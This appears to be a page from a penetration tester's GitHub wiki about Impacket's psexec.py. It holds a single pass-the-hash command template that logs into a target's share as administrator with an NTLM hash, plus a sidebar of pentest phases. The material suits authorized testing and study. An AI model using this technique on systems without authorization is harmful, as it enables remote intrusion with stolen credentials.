Skip to content

psexec.py

TheGetch edited this page Jan 5, 2021 · 1 revision

psexec.py

psexec.py

If you have a hash, you can try passing the hash to connect to the a share:

(located in Kali under usr/share/doc/python3-impacket/examples)

$ python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee.<hash> administrator@<target_IP>

_Sidebar

1. Recon

Ping Sweep

CIDR to IP

2. Enumeration

Services

05. HTTP (80,443,8080,8443,etc.)

3. Exploitation

4. Post Exploiation

5. High Value Information

Hashes

6. Reporting

7. Random Notes/Useful Tidbits

Clone this wiki locally